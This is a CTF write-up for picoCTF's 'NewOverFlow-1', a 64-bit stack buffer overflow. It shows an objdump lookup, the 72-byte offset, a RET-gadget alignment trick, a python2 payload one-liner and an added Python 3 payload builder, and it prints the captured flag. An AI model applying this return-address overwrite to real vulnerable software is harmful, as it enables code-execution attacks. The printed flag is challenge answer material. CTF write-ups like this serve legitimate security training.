ctftime

My solutions for various CTF challenges


NewOverFlow-1

Binary Exploitation - Points: 200

Let's try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program.

Provided files: vuln (binary), vuln.c (source)

Get the address of the flag function:

$ objdump -d vuln| grep flag
  0000000000400767 <flag>:

Overflow the 64-byte buffer plus the 8 bytes of saved RBP (72 bytes in total) so that the next 8 bytes overwrite the saved return address, i.e. the value loaded into RIP on return, with the address of flag. Since the program crashes before any output, I added the address of a RET gadget before the flag address, and it successfully prints the flag on the shell server.

$ python2 -c "print('A'*72+'\xde\x05\x40'+'\x00'*5 + '\x67\x07\x40'+'\x00'*5)" | ./vuln

flag: picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_72d3e39f}
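The same 72-byte padding, RET gadget and flag address as a Python 3 payload builder (an added example, not code from the original writeup). It packs the two addresses with struct instead of hand-written escapes, since in Python 3 a str-based print one-liner like the one above would emit UTF-8 rather than raw bytes, and it includes a decoder to check the layout before piping the result into ./vuln.

```python
import struct
import sys

# Addresses taken from the writeup above (vuln is not position-independent, so they are fixed).
RET_GADGET = 0x4005DE   # lone `ret` instruction, executed first to realign the stack
FLAG_ADDR = 0x400767    # flag(), from `objdump -d vuln | grep flag`

BUF_SIZE = 64           # vuln's stack buffer
SAVED_RBP = 8           # saved frame pointer between the buffer and the return address


def build_payload(ret_gadget=RET_GADGET, flag_addr=FLAG_ADDR, padding=BUF_SIZE + SAVED_RBP):
    """Return the bytes fed to vuln's stdin: padding, then two 8-byte little-endian return addresses."""
    pad = b"A" * padding
    # "<Q" packs an unsigned 64-bit little-endian word, which is what the
    # '\xde\x05\x40' + '\x00'*5 escapes in the python2 one-liner spelled out by hand.
    chain = struct.pack("<Q", ret_gadget) + struct.pack("<Q", flag_addr)
    # Trailing newline ends the line read by the program, as python2's print did.
    return pad + chain + b"\n"


def decode_payload(payload, padding=BUF_SIZE + SAVED_RBP):
    """Split a payload back into (padding, [return addresses]) to double-check the layout."""
    body = payload.rstrip(b"\n")
    pad, chain = body[:padding], body[padding:]
    if len(chain) % 8:
        raise ValueError("return-address chain is not a whole number of 8-byte words")
    addrs = [struct.unpack("<Q", chain[i:i + 8])[0] for i in range(0, len(chain), 8)]
    return pad, addrs


if __name__ == "__main__":
    # Usage: python3 payload.py | ./vuln
    sys.stdout.buffer.write(build_payload())
```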